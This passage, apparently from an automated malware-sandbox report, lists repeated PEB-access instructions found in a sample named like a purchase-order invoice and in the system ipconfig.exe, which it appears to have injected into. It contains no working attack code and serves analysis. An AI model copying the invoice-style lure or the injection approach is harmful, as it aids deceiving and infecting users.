Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]	1_2_00F8F358
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]	1_2_00F8DB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]	1_2_01058D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]	1_2_0100A537
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]	1_2_0104E539
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]	1_2_01003540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]	1_2_01033D40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]	1_2_00F9849B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]	1_2_00FA746D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]	1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]	1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]	1_2_00FBA44B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]	1_2_00FBBC2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]	1_2_01038DF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]	1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]	1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]	1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]	1_2_0101C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]	1_2_0101C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB35A1 mov eax, dword ptr fs:[00000030h]	1_2_00FB35A1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]	1_2_00FBFD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]	1_2_00FBFD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]	1_2_00FAC577
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]	1_2_00FAC577
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA7D50 mov eax, dword ptr fs:[00000030h]	1_2_00FA7D50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC3D43 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D43
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8AD30 mov eax, dword ptr fs:[00000030h]	1_2_00F8AD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058CD6 mov eax, dword ptr fs:[00000030h]	1_2_01058CD6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]	1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]	1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]	1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010414FB mov eax, dword ptr fs:[00000030h]	1_2_010414FB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]	1_2_0105070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]	1_2_0105070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]	1_2_0101FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]	1_2_0101FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB16E0 mov ecx, dword ptr fs:[00000030h]	1_2_00FB16E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F976E2 mov eax, dword ptr fs:[00000030h]	1_2_00F976E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB36CC mov eax, dword ptr fs:[00000030h]	1_2_00FB36CC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC8EC7 mov eax, dword ptr fs:[00000030h]	1_2_00FC8EC7
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058F6A mov eax, dword ptr fs:[00000030h]	1_2_01058F6A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9766D mov eax, dword ptr fs:[00000030h]	1_2_00F9766D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]	1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]	1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]	1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8E620 mov eax, dword ptr fs:[00000030h]	1_2_00F8E620
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]	1_2_00FBA61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]	1_2_00FBA61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]	1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]	1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]	1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB8E00 mov eax, dword ptr fs:[00000030h]	1_2_00FB8E00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC37F5 mov eax, dword ptr fs:[00000030h]	1_2_00FC37F5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041608 mov eax, dword ptr fs:[00000030h]	1_2_01041608
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103FE3F mov eax, dword ptr fs:[00000030h]	1_2_0103FE3F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]	1_2_0104AE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]	1_2_0104AE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F98794 mov eax, dword ptr fs:[00000030h]	1_2_00F98794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101FE87 mov eax, dword ptr fs:[00000030h]	1_2_0101FE87
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9FF60 mov eax, dword ptr fs:[00000030h]	1_2_00F9FF60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]	1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]	1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]	1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010046A7 mov eax, dword ptr fs:[00000030h]	1_2_010046A7
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9EF40 mov eax, dword ptr fs:[00000030h]	1_2_00F9EF40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103FEC0 mov eax, dword ptr fs:[00000030h]	1_2_0103FEC0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBE730 mov eax, dword ptr fs:[00000030h]	1_2_00FBE730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058ED6 mov eax, dword ptr fs:[00000030h]	1_2_01058ED6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]	1_2_00F84F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]	1_2_00F84F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAF716 mov eax, dword ptr fs:[00000030h]	1_2_00FAF716
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]	1_2_00FBA70E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]	1_2_00FBA70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2AE4 mov eax, dword ptr fs:[00000030h]	5_2_02EA2AE4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2ACB mov eax, dword ptr fs:[00000030h]	5_2_02EA2ACB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]	5_2_02E8AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]	5_2_02E8AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAFAB0 mov eax, dword ptr fs:[00000030h]	5_2_02EAFAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]	5_2_02EAD294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]	5_2_02EAD294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB927A mov eax, dword ptr fs:[00000030h]	5_2_02EB927A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]	5_2_02F2B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]	5_2_02F2B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48A62 mov eax, dword ptr fs:[00000030h]	5_2_02F48A62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3EA55 mov eax, dword ptr fs:[00000030h]	5_2_02F3EA55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F04257 mov eax, dword ptr fs:[00000030h]	5_2_02F04257
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]	5_2_02EB4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]	5_2_02EB4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E88A0A mov eax, dword ptr fs:[00000030h]	5_2_02E88A0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]	5_2_02F3AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]	5_2_02F3AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]	5_2_02E7AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]	5_2_02E7AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E93A1C mov eax, dword ptr fs:[00000030h]	5_2_02E93A1C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov ecx, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9DBE9 mov eax, dword ptr fs:[00000030h]	5_2_02E9DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]	5_2_02EF53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]	5_2_02EF53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]	5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]	5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]	5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F45BA5 mov eax, dword ptr fs:[00000030h]	5_2_02F45BA5
